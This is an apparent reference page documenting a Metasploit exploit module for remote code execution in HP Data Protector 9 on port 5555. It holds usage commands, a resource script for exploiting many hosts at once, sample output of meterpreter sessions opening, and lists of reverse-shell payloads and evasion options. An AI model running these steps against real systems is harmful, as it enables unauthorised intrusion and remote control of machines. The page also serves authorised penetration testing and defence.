HP Data Protector EXEC_INTEGUTIL Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/hp_data_protector_exec_integutil metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: HP Data Protector EXEC_INTEGUTIL Remote Code Execution
Module: exploit/multi/misc/hp_data_protector_exec_integutil
Source code: modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
Disclosure date: 2014-10-02
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 5555
List of CVEs: -

This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL request allows to execute arbitrary commands from a restricted directory. Since it includes a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute arbitrary code. On linux targets, the perl binary isn't on the restricted directory, but an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP Data Protector for linux. This module has been tested successfully on HP Data Protector 9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Using hp_data_protector_exec_integutil against a single host

Normally, you can use exploit/multi/misc/hp_data_protector_exec_integutil this way:

msf > use exploit/multi/misc/hp_data_protector_exec_integutil
msf exploit(hp_data_protector_exec_integutil) > show targets
    ... a list of targets ...
msf exploit(hp_data_protector_exec_integutil) > set TARGET target-id
msf exploit(hp_data_protector_exec_integutil) > show options
    ... show and set options ...
msf exploit(hp_data_protector_exec_integutil) > exploit

Using hp_data_protector_exec_integutil against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your hp_data_protector_exec_integutil will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/misc/hp_data_protector_exec_integutil")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/hp_data_protector_exec_integutil exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/hp_data_protector_exec_integutil

msf6 exploit(multi/misc/hp_data_protector_exec_integutil) > show info

       Name: HP Data Protector EXEC_INTEGUTIL Remote Code Execution
     Module: exploit/multi/misc/hp_data_protector_exec_integutil
   Platform: 
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2014-10-02

Provided by:
  Aniway.Anyway <[email protected]>
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Linux 64 bits / HP Data Protector 9
  1   Windows 64 bits / HP Data Protector 9

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   5555             yes       The target port (TCP)

Payload information:

Description:
  This exploit abuses a vulnerability in the HP Data Protector. The 
  vulnerability exists in the Backup client service, which listens by 
  default on TCP/5555. The EXEC_INTEGUTIL request allows to execute 
  arbitrary commands from a restricted directory. Since it includes a 
  perl executable, it's possible to use an EXEC_INTEGUTIL packet to 
  execute arbitrary code. On linux targets, the perl binary isn't on 
  the restricted directory, but an EXEC_BAR packet can be used to 
  access the perl binary, even in the last version of HP Data 
  Protector for linux. This module has been tested successfully on HP 
  Data Protector 9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.

References:
  http://www.zerodayinitiative.com/advisories/ZDI-14-344

Module Options


This is a complete list of options available in the multi/misc/hp_data_protector_exec_integutil exploit:

msf6 exploit(multi/misc/hp_data_protector_exec_integutil) > show options

Module options (exploit/multi/misc/hp_data_protector_exec_integutil):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   5555             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Linux 64 bits / HP Data Protector 9

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/hp_data_protector_exec_integutil exploit:

msf6 exploit(multi/misc/hp_data_protector_exec_integutil) > show advanced

Module advanced options (exploit/multi/misc/hp_data_protector_exec_integutil):

   Name                                    Current Setting  Required  Description
   ----                                    ---------------  --------  -----------
   CHOST                                                    no        The local client address
   CPORT                                                    no        The local client port
   ConnectTimeout                          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                   no        The information file that contains context information
   DisablePayloadHandler                   false            no        Disable the handler code for the selected payload
   EnableContextEncoding                   false            no        Use transient context when encoding payloads
   Powershell::encode_final_payload        false            yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false            yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false            yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false            yes       Encrypt PSH with RC4
   Powershell::method                      reflection       yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false            yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true             yes       Execute powershell without interaction
   Powershell::persist                     false            yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true             yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                no        Prepend seconds of sleep
   Powershell::remove_comspec              false            yes       Produce script calling powershell directly
   Powershell::strip_comments              true             yes       Strip comments
   Powershell::strip_whitespace            false            yes       Strip whitespace
   Powershell::sub_funcs                   false            yes       Substitute function names
   Powershell::sub_vars                    true             yes       Substitute variable names
   Powershell::wrap_double_quotes          true             yes       Wraps the -Command argument in single quotes
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode                           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion                              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                                 false            no        Enable detailed status messages
   WORKSPACE                                                no        Specify the workspace for this module
   WfsDelay                                20               no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/hp_data_protector_exec_integutil module can exploit:

msf6 exploit(multi/misc/hp_data_protector_exec_integutil) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux 64 bits / HP Data Protector 9
   1   Windows 64 bits / HP Data Protector 9

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/hp_data_protector_exec_integutil exploit:

msf6 exploit(multi/misc/hp_data_protector_exec_integutil) > show payloads

Compatible Payloads
===================

   #   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                             normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_perl                            normal  No     Unix Command Shell, Bind TCP (via Perl)
   2   payload/cmd/unix/bind_perl_ipv6                       normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   3   payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   4   payload/cmd/unix/reverse_awk                          normal  No     Unix Command Shell, Reverse TCP (via AWK)
   5   payload/cmd/unix/reverse_bash                         normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   6   payload/cmd/unix/reverse_openssl                      normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   7   payload/cmd/unix/reverse_perl                         normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   10  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/hp_data_protector_exec_integutil exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/hp_data_protector_exec_integutil) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

HP Data Protector dir not found, using the default <DIR>


Here is a relevant code snippet related to the "HP Data Protector dir not found, using the default <DIR>" error message:

108:	    leak = leak_hp_directory(rand_exec)
109:	    dir = parse_dir(leak, rand_exec)
110:	
111:	    if dir.nil?
112:	      dir = default_hp_dir
113:	      print_error("HP Data Protector dir not found, using the default #{dir}")
114:	    else
115:	      unless valid_target?(dir)
116:	        print_error("HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
117:	      end
118:	    end

HP Data Protector directory leaked as <DIR>, <TARGET.NAME> looks incorrect, trying anyway...


Here is a relevant code snippet related to the "HP Data Protector directory leaked as <DIR>, <TARGET.NAME> looks incorrect, trying anyway..." error message:

111:	    if dir.nil?
112:	      dir = default_hp_dir
113:	      print_error("HP Data Protector dir not found, using the default #{dir}")
114:	    else
115:	      unless valid_target?(dir)
116:	        print_error("HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
117:	      end
118:	    end
119:	
120:	    if target.name =~ /Windows/
121:	      #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Aniway.Anyway <Aniway.Anyway[at]gmail.com>
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.31-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.